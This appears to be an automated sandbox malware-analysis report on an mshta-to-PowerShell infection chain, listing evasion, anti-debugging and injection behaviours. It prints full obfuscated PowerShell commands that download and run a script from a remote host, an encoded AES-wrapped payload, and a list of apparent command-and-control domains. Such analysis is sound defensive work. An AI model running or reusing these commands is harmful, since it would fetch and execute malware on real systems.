              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BE9635 rdtsc 4_2_06BE9635
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3916Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 949Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4300Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5432Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2201Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4812Thread sleep time: -12912720851596678s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5808Thread sleep count: 2201 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: mshta.exe, 00000000.00000002.1727175203.0000000003099000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: powershell.exe, 00000009.00000002.2885773089.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.2456406538.0000000007088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_9-13471
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BE9635 Start: 06BE9652 End: 06BE96594_2_06BE9635
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BE962D Start: 06BE9652 End: 06BE96594_2_06BE962D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BE9645 Start: 06BE9659 End: 06BE96524_2_06BE9645
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BE95E5 Start: 06BE9652 End: 06BE96594_2_06BE95E5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BE9635 rdtsc 4_2_06BE9635
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043BAD0 LdrInitializeThunk,9_2_0043BAD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: powershell.exeString found in binary or memory: hummskitnj.buzz
              Source: powershell.exeString found in binary or memory: cashfuzysao.buzz
              Source: powershell.exeString found in binary or memory: appliacnesot.buzz
              Source: powershell.exeString found in binary or memory: screwamusresz.buzz
              Source: powershell.exeString found in binary or memory: inherineau.buzz
              Source: powershell.exeString found in binary or memory: scentniej.buzz
              Source: powershell.exeString found in binary or memory: rebuildeso.buzz
              Source: powershell.exeString found in binary or memory: prisonyfork.buzz
              Source: powershell.exeString found in binary or memory: noisercluch.click
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.AesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kowp($wfbpy){return -split ($wfbpy -replace '..', '0x$& ')};$mbfyr = kowp('9e334b36da65fc4cd88fd0d54c1c22fbf8dc3b04bea415ee8d3a4d1484b0406150b7ff1c184327b495dc49163e68ae0670ba32d22b53f3d21dccdda39fd3253fed91de2b3f77e4037b055f4b3412d5ccdc3a1b39789f06f7930dc4a07956fa68eca8e2f6499d93177d1921ae2418cb2699ec6c80e7279a8abd6a9a4d7e3fe3e8dbe4570e1f55a43d6d4c508fa56991f95689680af64b5262a41d3d94c5f57cfa20aeb1a08ff2bf17b5dacb4212c70dab809fdb5cbe0fb22347ae8ac80dfc19be9c5ba8e9936657f3587dc5a7c1b93b8b5b8928d6f42dffa7e01fdf4e34c895c6039aa5aad3d62f3554cf79ffd5e8d7a01a4ee09aff55f72c99249d32b683a307373ee57bf7dabb7b643375c84a3675780a53350109bb137cd9b3151e1862197a092a63d6891d60c45b0e08870aca193a7ae7a69f71d5319d1c5591c30f1eb14bf2e8cac0c0aa47b1cf263341221208edd70adc782580aef182c6ede0ac0c8846ba02132ccc59fe2fba0af85cc83a92b444e34d299ce4bb78d2e67097531997b9c398afa59a05087ad10cb8fccd64b089cb7e1d9448a06e5451b7e1fad3cd11656ce7d71529fc0aeeec74a57c9b8ada400e5bb14d609b2a4d2c9887a949a351792f6daad814bcef8c2537ea18295dbf31bebe4d1bfa7bbe02dadaccfc47444eb2b533f4a699b7865c05848bb784791abdba2f36a897be319943b5c85f80d1b9901f0ffc37613068553b99ee84836a56cb1f70957317e3a43f3d9ebbbe18feeee52ce041029ab9ae45a4c86f910a6ddf5765b4bdb03cb85481ddc8c8212a1f1f92b468be8cb5336e24ed88c9ec8a01cd4f72de404497dbb43a1c6a3822034f15f5f613ef5ad780b9692707bab44fb088a6061592c44b022a6d2a450c99c283117c8de80e765c31e70308152e59458e6fd3a65543c1ec931ac1a324732f6d1faac4abd5f572332947d1cb4967831073016e5efaef616f9317b004a73fffa3bb2982e91cbdec269fef3ef96395f94be96d5496bdf35e25a6638e2e25097db07c73c3edd7402bed8fc500882da3aaffc8d06fd1bdde8708df8df844f0ddceccaa22d16bab70d3b7d5e264b1ae1584137dd7bda7005c6f39d6c9271a903bb3663e0edf514bf4a8d05593db9b5ddfc4556bac017ae2de8428ea44a76d6e9afc522c9004ed9c593141666a52943ad448960d2c7623e6c4af33f5bad89705b716c876ae63e40d381b88ebeeb6363614481cfb2012acabc9c09e6d61b30149f2e4fa7380a70464224bec1abe9475dbd5b97fcf0278165f21fb815ff60146030497a1ac45d69ca7553003c733f00f0973a5fd787f2e4dec6f22a0bd2b2f6f882afafcfc5c903fb6aaedd7f994e291239b6b7d06cf6df234fb061934125997ffac95d4511365a41a1a1a2b19410abb92ee5511d9acb16adbbcfe5b0c2a4cf6c8b8cd6f6e0e9fdf7232373370c3cb4477d9d543073daf28d5809ad15346e15e3e789993ef8d9b807067bf4f550783802415488f744831f04feef6925abc1b6b107b1002ff450b386d584c659f07eb9483654ca1f5116547b9383d4f85cd91ce2d9f6088d2ce491512578016e54a41fae48b2708f2ab1fa5c98f21304571169f6900a36e6ab306adb4533f862332fe99dca4cc3c773200966c0661e34a4320c65cf06429fcf2c90f24ece6ed646948a6b8ccc0b81784faffc3007767bbc247c0a4fd247054540d44a8f8f303c529528c742475550e80ff0a5ce818cf6a23675e50f990211be6a6dc6d729cc913740aee1a9cde15b4f8d33d82ca43b137e9b62f21e5fc4638a978553bec16e68b51442628a7b1b7cd74d29750eea98b02dce0dc70288eaa41730bdd489c393e565891b9e2c52fe9e6a9704f6ff74b93abf9307ea0d851bcdf290e0a8461d19516abb02c61c6cbe1e1c259');$ajig=-join [char[]](([security.cryptography.aes
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -*;set-variable ciu (.$executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name)|member|where-object{$_.name-like'*t*om*d'}).name).invoke($executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name).psobject.methods|where-object{$_.name-like'*om*e'}).name).invoke('n*-o*',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://cc.klipjaqemiu.shop/web.png';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value|member)|where-object{$_.name-like'*nl*g'}).name).invoke((variable lw).value)).invokereturnasis()
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kowp($wfbpy){return -split ($wfbpy -replace '..', '0x$& ')};$mbfyr = kowp('9e334b36da65fc4cd88fd0d54c1c22fbf8dc3b04bea415ee8d3a4d1484b0406150b7ff1c184327b495dc49163e68ae0670ba32d22b53f3d21dccdda39fd3253fed91de2b3f77e4037b055f4b3412d5ccdc3a1b39789f06f7930dc4a07956fa68eca8e2f6499d93177d1921ae2418cb2699ec6c80e7279a8abd6a9a4d7e3fe3e8dbe4570e1f55a43d6d4c508fa56991f95689680af64b5262a41d3d94c5f57cfa20aeb1a08ff2bf17b5dacb4212c70dab809fdb5cbe0fb22347ae8ac80dfc19be9c5ba8e9936657f3587dc5a7c1b93b8b5b8928d6f42dffa7e01fdf4e34c895c6039aa5aad3d62f3554cf79ffd5e8d7a01a4ee09aff55f72c99249d32b683a307373ee57bf7dabb7b643375c84a3675780a53350109bb137cd9b3151e1862197a092a63d6891d60c45b0e08870aca193a7ae7a69f71d5319d1c5591c30f1eb14bf2e8cac0c0aa47b1cf263341221208edd70adc782580aef182c6ede0ac0c8846ba02132ccc59fe2fba0af85cc83a92b444e34d299ce4bb78d2e67097531997b9c398afa59a05087ad10cb8fccd64b089cb7e1d9448a06e5451b7e1fad3cd11656ce7d71529fc0aeeec74a57c9b8ada400e5bb14d609b2a4d2c9887a949a351792f6daad814bcef8c2537ea18295dbf31bebe4d1bfa7bbe02dadaccfc47444eb2b533f4a699b7865c05848bb784791abdba2f36a897be319943b5c85f80d1b9901f0ffc37613068553b99ee84836a56cb1f70957317e3a43f3d9ebbbe18feeee52ce041029ab9ae45a4c86f910a6ddf5765b4bdb03cb85481ddc8c8212a1f1f92b468be8cb5336e24ed88c9ec8a01cd4f72de404497dbb43a1c6a3822034f15f5f613ef5ad780b9692707bab44fb088a6061592c44b022a6d2a450c99c283117c8de80e765c31e70308152e59458e6fd3a65543c1ec931ac1a324732f6d1faac4abd5f572332947d1cb4967831073016e5efaef616f9317b004a73fffa3bb2982e91cbdec269fef3ef96395f94be96d5496bdf35e25a6638e2e25097db07c73c3edd7402bed8fc500882da3aaffc8d06fd1bdde8708df8df844f0ddceccaa22d16bab70d3b7d5e264b1ae1584137dd7bda7005c6f39d6c9271a903bb3663e0edf514bf4a8d05593db9b5ddfc4556bac017ae2de8428ea44a76d6e9afc522c9004ed9c593141666a52943ad448960d2c7623e6c4af33f5bad89705b716c876ae63e40d381b88ebeeb6363614481cfb2012acabc9c09e6d61b30149f2e4fa7380a70464224bec1abe9475dbd5b97fcf0278165f21fb815ff60146030497a1ac45d69ca7553003c733f00f0973a5fd787f2e4dec6f22a0bd2b2f6f882afafcfc5c903fb6aaedd7f994e291239b6b7d06cf6df234fb061934125997ffac95d4511365a41a1a1a2b19410abb92ee5511d9acb16adbbcfe5b0c2a4cf6c8b8cd6f6e0e9fdf7232373370c3cb4477d9d543073daf28d5809ad15346e15e3e789993ef8d9b807067bf4f550783802415488f744831f04feef6925abc1b6b107b1002ff450b386d584c659f07eb9483654ca1f5116547b9383d4f85cd91ce2d9f6088d2ce491512578016e54a41fae48b2708f2ab1fa5c98f21304571169f6900a36e6ab306adb4533f862332fe99dca4cc3c773200966c0661e34a4320c65cf06429fcf2c90f24ece6ed646948a6b8ccc0b81784faffc3007767bbc247c0a4fd247054540d44a8f8f303c529528c742475550e80ff0a5ce818cf6a23675e50f990211be6a6dc6d729cc913740aee1a9cde15b4f8d33d82ca43b137e9b62f21e5fc4638a978553bec16e68b51442628a7b1b7cd74d29750eea98b02dce0dc70288eaa41730bdd489c393e565891b9e2c52fe9e6a9704f6ff74b93abf9307ea0d851bcdf290e0a8461d19516abb02c61c6cbe1e1c259');$ajig=-join [char[]](([security.cryptography.aesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -*;set-variable ciu (.$executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name)|member|where-object{$_.name-like'*t*om*d'}).name).invoke($executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name).psobject.methods|where-object{$_.name-like'*om*e'}).name).invoke('n*-o*',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://cc.klipjaqemiu.shop/web.png';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value|member)|where-object{$_.name-like'*nl*g'}).name).invoke((variable lw).value)).invokereturnasis() Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
